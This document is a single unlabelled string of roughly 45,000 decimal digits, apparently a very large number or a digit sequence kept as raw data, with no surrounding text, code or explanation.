489139095620099393610310291616152881384379099042317473363948045759314931405297634757481193567091101377517210080315590248530906692037671922033229094334676851422144773793937517034436619910403375111735471918550464490263655128162288244625759163330391072253837421821408835086573917715096828874782656995995744906617583441375223970968340800535598491754173818839994469748676265516582765848358845314277568790029095170283529716344562129640435231176006651012412006597558512761785838292041974844236080071930457618932349229279650198751872127267507981255470958904556357921221033346697499235630254947802490114195212382815309114079073860251522742995818072471625916685451333123948049470791191532673430282441860414263639548000448002670496248201792896476697583183271314251702969234889627668440323260927524960357996469256504936818360900323809293459588970695365349406034021665443755890045632882250545255640564482465151875471196218443965825337543885690941130315095261793780029741207665147939425902989695946995565761218656196733786236256125216320862869222103274889218654364802296780705765615144632046927906821207388377814233562823608963208068222468012248261177185896381409183903673672220888321513755600372798394004152970028783076670944474560134556417254370906979396122571429894671543578468788614445812314593571984922528471605049221242470141214780573455105008019086996033027634787081081754501193071412233908663938339529425786905076431006383519834389341596131854347546495569781038293097164651438407007073604112373599843452251610507027056235266012764848308407611830130527932054274628654036036745328651057065874882256981579367897669742205750596834408697350201410206723585020072452256326513410559240190274216248439140359989535394590944070469120914093870012645600162374288021092764579310657922955249887275846101264836999892256959688159205600101655256375678566722796619885782794848855834397518744545512965634434803966420557982936804352202770984294232533022576341807039476994159791594530069752148293366555661567873640053666564165473217043903521329543529169414599041608753201868379370234888689479151071637852902345292440773659495630510074210871426134974595615138498713757047101787957310422969066670214498637464595280824369445789772330048764765241339075920434019634039114732023380715095222010682563427471646024335440051521266932493419673977041595683753555166730273900749729736354964533288869844061196496162773449518273695588220757355176651589855190986665393549481068873206859907540792342402300925900701731960362254756478940647548346647760411463233905651343306844953979070903023460461470961696886885014083470405460742958699138296682468185710318879065287036650832431974404771855678934823089431068287027228097362480939962706074726455399253994428081137369433887294063079261595995462624629707062594845569034711972996409089418059534393251236235508134949004364278527138315912568989295196427287573946914272534366941532361004537304881985517065941217352462589548730167600298865925786628561249665523533829428785425340483083307016537228563559152534784459818313411290019992059813522051173365856407826484942764411376393866924803118364453698589175442647399882284621844900877769776312795722672655562596282542765318300134070922334365779160128093179401718598599933849235495640057099558561134980252499066984233017350358044081168552653117099570899427328709258487894436460050410892266917835258707859512983441729535195378855345737426085902908176515578039059464087350612322611200937310804854852635722825768203416050484662775045003126200800799804925485346941469775164932709504934639382432227188515974054702148289711177792376122578873477188196825462981268685817050740272550263329044976277894423621674119186269439650671515779586756482399391760426017633870454990176143641204692182370764887834196896861181558158736062938603810171215855272668300823834046564758804051380801633638874216371406435495561868964112282140753302655100424104896783528588290243670904887118190909494533144218287661810310073547705498159680772009474696134360928614849417850171807793068108546900094458995279424398139213505586422196483491512639012803832001097738680662877923971801461343244572640097374257007359210031541508936793008169980536520276007277496745840028362405346037263416554259027601834840306811381855105979705664007509426087885735796037324514146786703688098806097164258497595138069309449401515422221943291302173912538355915031003330325111749156969174502714943315155885403922164097229101129035521815762823283182342548326111912800928252561902052630163911477247331485739107775874425387611746578671169414776421441111263583553871361011023267987756410246824032264834641766369806637857681349204530224081972785647198396308781543221166912246415911776732253264335686146186545222681268872684459684424161078540167681420808850280054143613146230821025941737562389942075713627516745731891894562835257044133543758575342698699472547031656613991999682628247270641336222178923903176085428943733935618891651250424404008952719837873864805847268954624388234375178852014395600571048119498842390606136957342315590796703461491434478863604103182350736502778590897578272731305048893989009923913503373250855982655867089242612429473670193907727130706869170926462548423240748550366080136046689511840093668609546325002145852930950000907151058236267293264537382104938724996699339424685516483261134146110680267446637334375340764294026682973865220935701626384648528514903629320199199688285171839536691345222444708045923966028171565515656661113598231122506289058549145097157553900243931535190902107119457300243880176615035270862602537881797519478061013715004489917210022201335013106016391541589578037117792775225978742891917915522417189585361680594741234193398420218745649256443462392531953135103311476394911995072858430658361935369329699289837914941939406085724863968836903265564364216644257607914710869984315733749648835292769328220762947282381537409961545598798259891093717126218283025848112389011968221429457667580718653806506487026133892822994972574530332838963818439447707794022843598834100358385423897354243956475556840952248445541392394100016207693636846776413017819659379971557468541946334893748439129742391433659360410035234377706588867781139498616478747140793263858738624732889645643598774667638479466504074111825658378878454858148962961273998413442726086061872455452360643153710112746809778704464094758280348769758948328241239292960582948619196670918958089833201210318430340128495116203534280144127617285830243559830032042024512072872535581195840149180969253395075778400067465526031446167050827682772223534191102634163157147406123850425845988419907611287258059113935689601431668283176323567325417073420817332230462987992804908514094790368878687894930546955703072619009502076433493359106024545086453628935456862958531315337183868265617862273637169757741830239860065914816164049449650117321313895747062088474802365371031150898427992754426853277974311395143574172219759799359685252285745263796289612691572357986620573408375766873884266405990993505000813375432454635967504844235284874701443545419576258473564216198134073468541117668831186544893776979566517279662326714810338643913751865946730024434500544995399742372328712494834706044063471606325830649829795510109541836235030309453097335834462839476304775645015008507578949548931393944899216125525597701436858943585877526379625597081677643800125436502371412783467926101995585224717220177723700417808419423948725406801556035998390548985723546745642390585850216719031395262944554391316631345308939062046784387785054239390524731362012947691874975191011472315289326772533918146607300089027768963114810902209724520759167297007850580717186381054967973100167870850694207092232908070383263453452038027860990556900134137182368370991949516489600755049341267876436746384902063964019766685592335654639138363185745698147196210841080961884605456039038455343729141446513474940784884423772175154334260306698831768331001133108690421939031080143784334151370924353013677631084913516156422698475074303297167469640666531527035325467112667522460551199581831963763707617991919203579582007595605302346267757943936307463056901080114942714100939136913810725813781357894005599500183542511841721360557275221035268037357265279224173736057511278872181908449006178013889710770822931002797665935838758909395688148560263224393726562472776037890814458837855019702843779362407825052704875816470324581290878395232453237896029841669225489649715606981192186584926770403956481278102179913217416305810554598801300484562997651121241536374515005635070127815926714241342103301566165356024733807843028655257222753049998837015348793008062601809623815161366903341111386538510919367393835229345888322550887064507539473952043968079067086806445096986548801682874343786126453815834280753061845485903798217994599681154419742536344399602902510015888272164745006820704193761584547123183460072629339550548239557137256840232268213012476794522644820910235647752723082081063518899152692889108455571126603965034397896278250016110153235160519655904211844949907789992007329476905868577878720982901352956613978884860509786085957017731298155314951681467176959760994210036183559138777817698458758104466283998806006162298486169353373865787735983361613384133853684211978938900185295691967804554482858483701170967212535338758621582310133103877668272115726949518179589754693992642197915523385766231676275475703546994148929041301863861194391962838870543677743224276809132365449485366768000001065262485473055861598999140170769838548318875014293890899506854530765116803337322265175662207526951791442252808165171667766727930354851542040238174608923283917032754257508676551178593950027933895920576682789677644531840404185540104351348389531201326378369283580827193783126549617459970567450718332065034556644034490453627560011250184335607361222765949278393706478426456763388188075656121689605041611390390639601620221536849410926053876887148379895599991120991646464411918568277004574243434021672276445589330127781586869525069499364610175685060167145354315814801054588605645501332037586454858403240298717093480910556211671546848477803944756979804263180991756422809873998766973237695737015808068229045992123661689025962730430679316531149401764737693873514093361833216142802149763399189835484875625298752423873077559555955465196394401821840998412489826236737714672260616336432964063357281070788758164043814850188411431885988276944901193212968271588841338694346828590066640806314077757725705630729400492940302420498416565479736705485580445865720227637840466823379852827105784319753541795011347273625774080213476826045022851579795797647467022840999561601569108903845824502679265942055503958792298185264800706837650418365620945554346135134152570065974881916341359556719649654032187271602648593049039787489589066127250794828276938953521753621850796297785146188432719223223810158744450528665238022532843891375273845892384422535472653098171578447834215822327020690287232330053862163479885094695472004795231120150432932266282727632177908840087861480221475376578105819702226309717495072127248479478169572961423658595782090830733233560348465318730293026659645013718375428897557971449924654038681799213893469244741985097334626793321072686870768062639919361965044099542167627840914669856925715074315740793805323925239477557441591845821562518192155233709607483329234921034514626437449805596103307994145347784574699992128599999399612281615219314888769388022281083001986016549416542616968586788372609587745676182507275992950893180521872924610867639958916145855058397274209809097817293239301067663868240401113040247007350857828724627134946368531815469690466968693925472519413992914652423857762550047485295476814795467007050347999588867695016124972282040303995463278830695976249361510102436555352230690612949388599015734661023712235478911292547696176005047974928060721268039226911027772261025441492215765045081206771735712027180242968106203776578837166909109418074487814049075517820385653909910477594141321543284406250301802757169650820964273484146957263978842560084531214065935809041271135920041975985136254796160632288736181367373244506079244117639975974619383584574915988097667447093006546342423460634237474666080431701260052055928493695941434081468529815053947178900451835755154125223590590687264878635752541911288877371766374860276606349603536794702692322971868327717393236192007774522126247518698334951510198642698878471719396649769070825217423365662725928440620430214113719922785269984698847702323823840055655517889087661360130477098438611687052310553149162517283732728676007248172987637569816335415074608838663640693470437206688651275688266149730788657015685016918647488541679154596507234287730699853713904300266530783987763850323818215535597323530686043010675760838908627049841888595138091030423595782495143988590113185835840667472370297149785084145853085781339156270760356390763947311455495832266945702494139831634332378975955680856836297253867913275055542524491943589128405045226953812179131914513500993846311774017971512283785460116035955402864405902496466930707769055481028850208085800878115773817191741776017330738554758006056014337743299012728677253043182519757916792969965041460706645712588834697979642931622965520168797300035646304579308840327480771811555330909887025505207680463034608658165394876951960044084820659673794731680864156456505300498816164905788311543454850526600698230931577765003780704661264706021457505793270962047825615247145918965223608396645624105195510522357239739512881816405978591427914816542632892004281609136937773722299983327082082969955737727375667615527113922588055201898876201141680054687365580633471603734291703907986396522961312801782679717289822936070288069087768660593252746378405397691848082041021944719713869256084162451123980620113184541244782050110798760717155683154078865439041210873032402010685341947230476666721749869868547076781205124736792479193150856444775379853799732234456122785843296846647513336573692387201464723679427870042503255589926884349592876124007558756946413705625140011797133166207153715436006876477318675587148783989081074295309410605969443158477539700943988394914432353668539209946879645066533985738887866147629443414010498889931600512076781035886116602029611936396821349607501116498327856353161451684576956871090029997698412632665023477167286573785790857466460772283415403114415294188047825438761770790430001566986776795760909966936075594965152736349811896413043311662774712338817406037317439705406703109676765748695358789670031925866259410510533584384656023391796749267844763708474978333655579007384191473198862713525954625181604342253729962863267496824058060296421146386436864224724887283434170441573482481833301640566959668866769563491416328426414974533349999480002669987588815935073578151958899005395120853510357261373640343675347141048360175464883004078464167452167371904831096767113443494819262681110739948250607394950735031690197318521195526356325843390998224986240670310768318446607291248747540316179699411397387765899868554170318847788675929026070043212666179192235209382278788809886335991160819235355570464634911320859189796132791319756490976000139962344455350143464268604644958624769094347048293294140411146540923988344435159133201077394411184074107684981066347241048239358274019449356651610884631256785297769734684303061462418035852933159734583038455410337010916767763742762102137013548544509263071901147318485749233181672072137279355679528443925481560913728128406333039373562420016045664557414588166052166608738748047243391212955877763906969037078828527753894052460758496231574369171131761347838827194168606625721036851321566478001476752310393578606896111259960281839309548709059073861351914591819510297327875571049729011487171897180046961697770017913919613791417162707018958469214343696762927459109940060084983568425201915593703701011049747339493877885989417433031785348707603221982970579751191440510994235883034546353492349826883624043327267415540301619505680654180939409982020609994140216890900708213307230896621197755306659188141191577836272927461561857103721724710095214236964830864102592887457999322374955191221951903424452307535133806856807354464995127203174487195403976107308060269906258076020292731455252078079914184290638844373499681458273372072663917670201183004648190002413083508846584152148991276106513741539435657211390328574918769094413702090517031487773461652879848235338297260136110984514841823808120540996125274580881099486972216128524897425555516076371675054896173016809613803811914361143992106380050832140987604599309324851025168294467260666138151745712559754953580239983146982203613380828499356705575524712902745397762140493182014658008021566536067765508783804304134310591804606800834591136640834887408005741272586704792258319127415739080914383138456424150940849133918096840251163991936853225557338966953749026620923261318855891580832455571948453875628786128859004106006073746501402627824027346962528217174941582331749239683530136178653673760642166778137739951006589528877427662636841830680190804609849809469763667335662282915132352788806157768278159588669180238940333076441912403412022316368577860357276941541778826435238131905028087018575047046312933353757285386605888904583111450773942935201994321971171642235005644042979892081594307167019857469273848653833436145794634175922573898588001698014757420542995801242958105456510831046297282937584161162532562516572498078492099897990620035936509934721582965174135798491047111660791587436986541222348341887722929446335178653856731962559852026072947674072616767145573649812105677716893484917660771705277187601199908144113058645577910525684304811440261938402322470939249802933550731845890355397133088446174107959162511714864874468611247605428673436709046678468670274091881014249711149657817724279347070216688295610877794405048437528443375108828264771978540006509704033021862556147332117771174413350281608840351781452541964320309576018694649088681545285621346988355444560249556668436602922195124830910605377201980218310103270417838665447181260397190688462370857518080035327047185659499476124248110999288679158969049563947624608424065930948621507690314987020673533848349550836366017848771060809804269247132410009464014373603265645184566792456669551001502298330798496079949882497061723674493612262229617908143114146609412341593593095854079139087208322733549572080757165171876599449856937956238755516175754380917805280294642004472153962807463602113294255916002570735628126387331060058910652457080244749375431841494014821199962764531068006631183823761639663180931444671298615527598201451410275600689297502463040173514891945763607893528555053173314164570504996443890936308438744847839616840518452732884032345202470568516465716477139323775517294795126132398229602394548579754586517458787713318138752959809412174227300352296508089177705068259248822322154938048371454781647213976820963320508305647920482085920475499857320388876391601995240918938945576768749730856955958010659526503036266159750662225084067428898265907510637563569968211510949669744580547288693631020367823250182323708459790111548472087618212477813266330412076216587312970811230758159821248639807212407868878114501655825136178903070860870198975889807456643955157415363193191981070575336633738038272152798849350397480015890519420879711308051233933221903466249917169150948541401871060354603794643379005890957721180804465743962806186717861017156740967662080295766577051291209907944304632892947306159510430902221439371849560634056189342513057268291465783293340524635028929175470872564842600349629611654138230077313327298305001602567240141851520418907011542885799208121984493156999059182011819733500126187728036812481995877070207532406361259313438595542547781961142935163561223496661522614735399674051584998603552953329245752388810136202347624669055816438967863097627365504724348643071218494373485300606387644566272186661701238127715621379746149861328744117714552444708997144522885662942440230184791205478498574521634696448973892062401943518310088283480249249085403077863875165911302873958787098100772718271874529013972836614842142871705531796543076504534324600536361472618180969976933486264077435199928686323835088756683595097265574815431940195576850437248001020413749831872259677387154958399718444907279141965845930083942637020875635398216962055324803212267498911402678528599673405242031091797899905718821949391320753431707980023736590985375520238911643467185582906853711897952626234492483392496342449714656846591248918556629589329909035239233333647435203707701010843880032907598342170185542283861617210417603011645918780539367447472059985023582891833692922337323999480437108419659473162654825748099482509991833006976569367159689364493348864744213500840700660883597235039532340179582557036016936990988671132109798897070517280755855191269930673099250704070245568507786790694766126298082251633136399521170984528092630375922426742575599892892783704744452189363203489415521044597261883800300677617931381399162058062701651024458869247649246891924612125310275731390840470007143561362316992371694848132554200914530410371354532966206392105479824392125172540132314902740585892063217589494345489068463993137570910346332714153162232805522972979538018801628590735729554162788676498274186164218789885741071649069191851162815285486794173638906653885764229158342500673612453849160674137340173572779956341043326883569507814931378007362354180070619180267328551191942676091221035987469241172837493126163395001239599240508454375698507957046222664619000103500490183034153545842833764378111988556318777792537201166718539541835984438305203762819440761594106820716970302285152250573126093046898423433152732131361216582808075212631547730604423774753505952287174402666389148817173086436111389069420279088143119448799417154042103412190847094080254023932942945493878640230512927119097513536000921971105412096683111516328705423028470073120658032626417116165957613272351566662536672718998534199895236884830999302757419916463841427077988708874229277053891227172486322028898425125287217826030500994510824783572905691988555467886079462805371227042466543192145281760741482403827835829719301017888345674167811398954750448339314689630763396657226727043393216745421824557062524797219978668542798977992339579057581890622525473582205236424850783407110144980478726691990186438822932305382318559732869780922253529591017341407334884761005564018242392192695062083183814546983923664613639891012102177095976704908305081854704194664371312299692358895384930136356576186106062228705599423371631021278457446463989738188566746260879482018647487672727222062676465338099801966883680994159075776852639865146253336312450536402610569605513183813174261184420189088853196356986962795036738424313011331753305329802016688817481342988681585577810343231753064784983210629718425184385534427620128234570716988530518326179641178579608888150329602290705614476220915094739035946646916235396809201394578175891088931992112260073928149169481615273842736264298098234063200244024495894456129167049508235812487391799648641133480324757775219708932772262349486015046652681439877051615317026696929704928316285504212898146706195331970269507214378230476875280287354126166391708245925170010714180854800636923259462019002278087409859771921805158532147392653251559035410209284665925299914353791825314545290598415817637058927906909896911164381187809435371521332261443625314490127454772695739393481546916311624928873574718824071503995009446731954316193855485207665738825139639163576723151005556037263394867208207808653734942440115799667507360711159351331959197120948964717553024531364770942094635696982226673775209945168450643623824211853534887989395673187806606107885440005508276570305587448541805778891719207881423351138662929667179643468760077047999537883387870348718021842437342112273940255717690819603092018240188427057046092622564178375265263358324240661253311529423457965569502506810018310900411245379015332966156970522379210325706937051090830789479999004999395322153622748476603613677697978567386584670936679588583788795625946464891376652199588286933801836011932368578558558195556042156250883650203322024513762158204618106705195330653060606501054887167245377942831338871631395596905832083416898476065607118347136218123246227258841990286142087284956879639325464285343075301105285713829643709990356948885285190402956047346131138263878897551788560424998748316382804046848618938189590542039889872650697620201995548412650005394428203930127481638158530396439925470201672759328574366661644110962566337305409219519675148328734808957477775278344221091073111351828046036347198185655572957144747682552857863349342858423118749440003229690697758315903858039353521358860079600342097547392296733310649395601812237812854584317605561733861126734780745850676063048229409653041118306671081893031108871728167519579675347188537229309616143204006381322465841111157758358581135018569047815368938137718472814751998350504781297718599084707621974605887423256995828892535041937958260616211842368768511418316068315867994601652057740529423053601780313357263267054790338401257305912339601880137825421927094767337191987287385248057421248921183470876629667207272325650565129333126059505777727542471241648312832982072361750574673870128209575544305968395555686861188397135522084452852640081252027665557677495969626612604565245684086139238265768583384698499778726706555191854468698469478495734622606294219624557085371272776523098955450193037732166649182578154677292005212667143463209637891852323215018976126034373684067194193037746880999296877582441047878123266253181845960453853543839114496775312864260925211537673258866722604042523491087026958099647595805794663973419064010036361904042033113579336542426303561457009011244800890020801478056603710154122328891465722393145076071670643556827437743965789067972687438473076346451677562103098604092717090951280863090297385044527182892749689212106670081648583395537735919136950153162018908887484210798706899114804669270650940762046502772528650728905328548561433160812693005693785417861096969202538865034577183176686885923681488475276498468821949739729707737187188400414323127636504814531122850990020742409255859252926103021067368154347015252348786351643976235860419194129697690405264832347009911154242601273438022089331096686367898694977994001260164227609260823493041180643829138347354679725399262338791582998486459271734059225620749105308531537182911681637219395188700957788181586850464507699343940987433514431626330317247747486897918209239480833143970840673084079589358108966564775859905563769525232653614424780230826811831037735887089240613031336477371011628214614661679404090518615260360092521947218890918107335871964142144478654899528582343947050079830388538860831035719306002771194558021911942899922722353458707566246926177663178855144350218287026685610665003531050216318206017609217984684936863161293727951873078972637353717150256378733579771808184878458866504335824377004147710414934927438457587107159731559439426412570270965125108115548247939403597681188117282472158250109496096625393395380922195591918188552678062149923172763163218339896938075616855911752998450132067129392404144593862398809381240452191484831646210147389182510109096773869066404158973610476436500068077105656718486281496371118832192445663945814491486165500495676982690308911185687986929470513524816091743243015383684707292898982846022237301452655679898627767968091469798378268764311598832109043715611299766521539635464420869197567370005738764978437686287681792497469438427465256316323005551304174227341646455127812784577772457520386543754282825671412885834544435132562054464241011037955464190581168623059644769587054072141985212106734332410756767575818456990693046047522770167005684543969234041711089888993416350585157887353430815520811772071880379104046983069578685473937656433631979786803671873079693924236321448450354776315670255390065423117920153464977929066241508328858395290542637687668968805033317227800185885069736232403894700471897619347344308437443759925034178807972235859134245813144049847701732361694719765715353197754997162785663119046912609182591249890367654176979903623755286526375733763526969344354400473067198868901968147428767790866979688522501636949856730217523132529265375896415171479559538784278499866456302878831962099830494519874396369070682762657485810439112232618794059941554063270131989895703761105323606298674803779153767511583043208498720920280929752649812569163425000522908872646925284666104665392171482080130502298052637836426959733707053922789153510568883938113249757071331029504430346715989448786847116438328050692507766274500122003526203709466023414648998390252588830148678162196775194583167718762757200505439794412459900771152051546199305098386982542846407255540927403132571632640792934183342147090412542533523248021932277075355546795871638358750181593387174236061551171013123525633485820365146141870049205704372018261733194715700867578539336078622739558185797587258744102542077105475361294047460100094095444959662881486915903899071865980563617137692227290764197755177720104276496949611056220592502420217704269622154958726453989227697660310524980855759471631075870133208861463266412591148633881220284440694169488261529577625325019870359870674380469821942056381255833436421949232275937221289056420943082352544084110864545369404969271494003319782861318186188811118408257865928757426384450059944229568586460481033015388911499486935436030221810943466764000022362550573631294626296096198760564259963946138692330837196265954739234624134597795748524647837980795693198650815977675350553918991151335252298736112779182748542008689539658359421963331502869561192012298889887006079992795411188269023078913107603617634779489432032102773359416908650071932804017163840644987871753756781185321328408216571107549528294974936214608215583205687232185574065161096274874375098092230211609982633033915469494644491004515280925089745074896760324090768983652940657920198315265410658136823791984090645712468948470209357761193139980246813405200394781949866202624008902150166163813538381515037735022966074627952910384068685569070157516624192987244482719429331004854824454580718897633003232525821581280327467962002814762431828622171054352898348208273451680186131719593324711074662228508710666117703465352839577625997744672185715816126411143271794347885990892808486694914139097716736900277758502686646540565950394867841110790116104008572744562938425494167594605487117235946429105850909950214958793112196135908315882620682332156153086833730838173279328196983875087083483880463884784418840031847126974543709373298362402875197920802321878744882872843727378017827008058782410749357514889978911739746129320351081432703251409030487462262942344327571260086642508333187688650756429271605525289544921537651751492196367181049435317858383453865255656640657251363575064353236508936790431702597878177190314867963840828810209461490079715137717099061954969640070867667102330048672631475510537231757114322317411411680622864206388906210192355223546711662137499693269321737043105987225039456574924616978260970253359475020913836673772894438696400028110344026084712899000746807764844088711341352503367877316797709372778682166117865344231732264637847697875144332095340001650692130546476890985050203015044880834261845208730530973189492916425322933612431514306578264070283898409841602950309241897120971601649265613413433422298827909921786042679812457285345801338260995877178113102167340256562744007296834066198480676615805021691833723680399027931606420436812079900316264449146190219458229690992122788553948783538305646864881655562294315673128274390826450611628942803501661336697824051770155219626522725455850738640585299830379180350432876703809252167907571204061237596327685674845079151147313440001832570344920909712435809447900462494313455028900680648704293534037436032625820535790118395649089354345101342969617545249573960621490288728932792520696535386396443225388327522499605986974759882329916263545973324445163755334377492928990581175786355555626937426910947117002165411718219750519831787137106051063795558588905568852887989084750915764639074693619881507814685262133252473837651192990156109189777922008705793396463827490680698769168197492365624226087154176100430608904377976678519661891404144925270480881971498801542057787006521594009289777601330756847966992955433656139847738060394368895887646054983871478968482805384701730871117761159663505039979343869339119789887109156541709133082607647406305711411098839388095481437828474528838368079418884342666222070438722887413947801017721392281911992365405516395893474263953824829609036900288359327745855060801317988407162446563997948275783650195514221551339281978226984278638391679715091262410548725700924070045488485692950448110738087996547481568913935380943474556972128919827177020766613602489581468119133614121258783895577357194986317210844398901423948496659251731388171602663261931065366535041473070804414939169363262373767777095850313255990095762731957308648042467701212327020533742667053142448208168130306397378736642483672539837487690980602182785786216512738563513290148903509883270617258932575363993979055729175160097615459044771692265806315111028038436017374742152476085152099016158582312571590733421736576267142390478279587281505095633092802668458937649649770232973641319060982740633531089792464242134583740901169391964250459128813403498810635400887596820054408364386516617880557608956896727531538081942077332597917278437625661184319891025007491829086475149794003160703845549465385946027452447466812314687943441610993338908992638411847425257044572517459325738989565185716575961481266020310797628254165590506042479114016957900338356574869252800743025623419498286467914476322774005529460903940177536335655471931000175430047504719144899841040015867946179241610016454716551337074073950260442769538553834397550548871099785205401175169747581344926079433689543783221172450687344231989878844128542064742809735625807066983106979935260693392135685881391214807354728463227784908087002467776303605551232386656295178853719673034634701222939581606792509153217489030840886516061119011498443412350124646928028805996134283511884715449771278473361766285062169778717743824362565711779450064477718370221999106695021656757644044997940765037999954845002710665987813603802314126836905783190460792765297277694043613023051787080546511542469395265127101052927070306673024447125973939950514628404767431363739978259184541176413327906460636584152927019030276017339474866960348694976541752429306040727005059039503148522921392575594845078867977925253931765156416197168443524369794447355964260633391055126826061595726217036698506473281266724521989060549880280782881429796336696744124805982192146339565745722102298677599746738126069367069134081559412016115960190237753525556300606247983261249881288192937343476862689219239777833910733106588256813777172328315329082525092733047850724977139448333892552081175608452966590553940965568541706001179857293813998258319293679100391844099286575605993598910002969864460974714718470101531283762631146774209145574041815908800064943237855839308530828305476076799524357391631221886057549673832243195650655460852881201902363644712703748634421727257879503428486312944916318475347531435041392096108796057730987201352484075057637199253650470908582513936863463863368042891767107602111159828875539940120076013947033661793715396306139863655492213741597905119083588290097656647300733879314678913181465109316761575821351424860442292445304113160652700974330088499034675405518640677342603583409608605533747362760935658853109760994238347382222087292464497684560579562516765574088410321731345627735856052358236389532038534024842273371639123973215995440828421666636023296545694703577184873442034227706653837387506169212768015766181095420097708363604361110592409117889540338021426523948929686439808926114635414571535194342850721353453018315875628275733898268898523557799295727645229391567477566676051087887648453493636068278050564622813598885879259940946446041705204470046315137975431737187756039815962647501410906658866162180038266989961965580587208639721176995219466789857011798332440601811575658074284182910615193917630059194314434605154047710570054339000182453117733718955857603607182860506356479979004139761808955363669603162193113250223851791672055180659263518036251214575926238369348222665895576994660491938112486609099798128571823494006615552196112207203092277646200999315244273589488710576623894693889446495093960330454340842102462401048723328750081749179875543879387381439894238011762700837196053094383940063756116458560943129517597713935396074322792489221267045808183313764165818269562105872892447740035947009268662659651422050630078592002488291860839743732353849083964326147000532423540647042089499210250404726781059083644007466380020870126664209457181702946752278540074508552377720890581683918446592829417018288233014971554235235911774818628592967605048203864343108779562892925405638946621948268711042828163893975711757786915430165058602965217459581988878680408110328432739867198621306205559855266036405046282152306154594474489908839081999738747452969810776201487134000122535522246695409315213115337915798026979555710508507473874750758068765376445782524432638046143042889235934852961058269382103498000405248407084403561167817170512813378805705643450616119330424440798260377951198548694559152051960093041271007277849301555038895360338261929343797081874320949914159593396368110627557295278004254863060054523839151068998913578820019411786535682149118528207852130125518518493711503422159542244511900207393539627400208110465530207932867254740543652717595893500716336076321614725815407642053020045340183572338292661915308354095120226329165054426123619197051613839357326693760156914429944943744856809775696303129588719161129294681884936338647392747601226964158848900965717086160598147204467428664208765334799858222090619802173211614230419477754990738738567941189824660913091691772274207233367635032678340586301930193242996397204445179288122854478211953530898910125342975524727635730226281382091807439748671453590778633530160821559911314144205091447293535022230817193663509346865858656314855575862447818620108711889760652969899269328178705576435143382060141077329261063431525337182243385263520217735440715281898137698755157574546939727150488469793619500477720970561793913828989845327426227288647108883270173723258818244658436249580592560338105215606206155713299156084892064340303395262263451454283678698288074251422567451806184149564686111635404971897682154227722479474033571527436819409892050113653400123846714296551867344153741615042563256713430247655125219218035780169240326699541746087592409207004669340396510178134857835694440760470232540755557764728450751826890418293966113310160131119077398632462778219023650660374041606724962490137433217246454097412995570529142438208076098364823465973886691349919784013108015581343979194852830436739012482082444814128095443773898320059864909159505322857914576884962578665885999179867520554558099004556461178755249370124553217170194282884617402736649978475508294228020232901221630102309772151569446427909802190826689868834263071609207914085197695235553488657743425277531197247430873043619511396119080030255878387644206085044730631299277888942729189727169890575925244679660189707482960949190648764693702750773866432391919042254290235318923377293166736086996228032557185308919284403805071030064776847863243191000223929785255372375566213644740096760539439838235764606992465260089090624105904215453927904411529580345334500256244101006359530039598864466169595626351878060688513723462707997327233134693971456285542615467650632465676620279245208581347717608521691340946520307673391841147504140168924121319826881568664561485380287539331160232292555618941042995335640095786495340935115266454024418775949316930560448686420862757201172319526405023099774567647838488973464317215980626787671838005247696884084989185086149003432403476742686245952395890358582135006450998178244636087317754378859677672919526111213859194725451400301180503437875277664402762618941017576872680428176623860680477885242887430259145247073950546525135339459598789619778911041890292943818567205070964606263541732944649576612651953495701860015412623962286413897796733329070567376962156498184506842263690367849555970026079867996261019039331263768556968767029295371162528005543100786408728939225714512481135778627664902425161990277471090335933309304948380597856628844787441469841499067123764789582263294904679812089984857163571087831191848630254501620929805829208334813638405421720056121989353669371336733392464416125223196943471206417375491216357008573694397305979709719726666642267431117762176403068681310351899112271339724036887000996862922546465006385288620393800504778276912835603372548255793912985251506829969107754257647488325341412132800626717094009098223529657957997803018282428490221470748111124018607613415150387569830918652780658896682362523937845272634530420418802508442363190383318384550522367992357752929106925043261446950109861088899914658551881873582528164302520939285258077969737620845637482114433988162710031703151334402309526351929588680690821355853680161000213740851154484912685841268695899174149133820578492800698255195740201818105641297250836070356851055331787840829000041552511865779453963317538532092149720526607831260281961164858098684587525129997404092797683176639914655386108937587952214971731728131517932904431121815871023518740757222100123768721944747209349312324107065080618562372526732540733324875754482967573450019321902199119960797989373383673242576103938985349278777473980508080015544764061053522202325409443567718794565430406735896491017610775948364540823486130254718476485189575836674399791508512858020607820554462991723202028222914886959399729974297471155371858924238493855858595407438104882624648788053304271463011941589896328792678327322456103852197011130466587100500083285177311776489735230926661234588873102883515626446023671996644554727608310118788389151149340939344750073025855814756190881398752357812331342279866503522725367171230756861045004548970360079569827626392344107146584895780241408158405229536937499710665594894459246286619963556350652623405339439142111271810691052290024657423604130093691889255865784668461215679554256605416005071276641766056874274200329577160643448606201239821698271723197826816628249938714995449137302051843669076723577400053932662622760323659751718925901801104290384274185507894887438832703063283279963007200698012244365116394086922220745320244624121155804354542064215121585056896157356414313068883443185280853975927734433655384188340303517822946253702015782157373265523185763554098954033236382319219892171177449469403678296185920803403867575834111518824177439145077366384071880489358256868542011645031357633355509440319236720348651010561049872726472131986543435450409131859513145181276437310438972507004981987052176272494065214619959232142314439776546708351714749367986186552791715824080651063799500184295938799158350171580759883784962257398512129810326379376218322456594236685376799113140108043139732335449090824910499143325843298821033984698141715756010829706583065211347076803680695322971990599904451209087275776225351040902392888779424630483280319132710495478599180196967835321464441189260631526618167443193550817081875477050802654025294109218264858213857526688155584113198560022135158887210365696087515063187533002942118682221893775546027227291290504292259787710667873840000616772154638441292371193521828499824350920891801685572798156421858191197490985730570332667646460728757430565372602768982373259745084479649545648030771598153955827779139373601717422996027353102768719449444917939785144631597314435351850491413941557329382048542123508173912549749819308714396615132942045919380106231421774199184060180347949887691051557905554806953878540066453375981862846419905220452803306263695626490910827627115903856995051246529996062855443838330327638599800792922846659503551211245284087516229060262011857775313747949362055496401073001348853150735487353905602908933526400713274732621960311773433943673385759124508149335736911664541281788171454023054750667136518258284898099512139193995633241336556777098003081910272040997148687418134667006094051021462690280449159646545330107754695413088714165312544813061192407821188690056027781824235022696189344352547633573536485619363254417756613981703930632872166905722259745209192917262199844409646158269456380239502837121686446561785235565164127712826918688615572716201474934052276946595712198314943381622114006936307430444173284786101777743837977037231795255434107223445512555589998646183876764903972461167959018100035098928641204195163551108763204267612979826529425882951141275841262732790798807559751851576841264742209479721843309352972665210015662514552994745127631550917636730259462132930190402837954246323258550301096706922720227074863419005438302650681214142135057154175057508639907673946335146209082888934938376439399256900604067311422093312195936202982972351163259386772241477911629572780752395056251581603133359382311500518626890530658368129988108663263271980611271548858798093487912913707498230575929091862939195014721197586067270092547718025750337730799397134539532646195269996596385654917590458333585799102012713204583903200853878881633637685182083727885131175227769609787962142372162545214591281831798216044111311671406914827170981015457781939202311563871950805024679725792497605772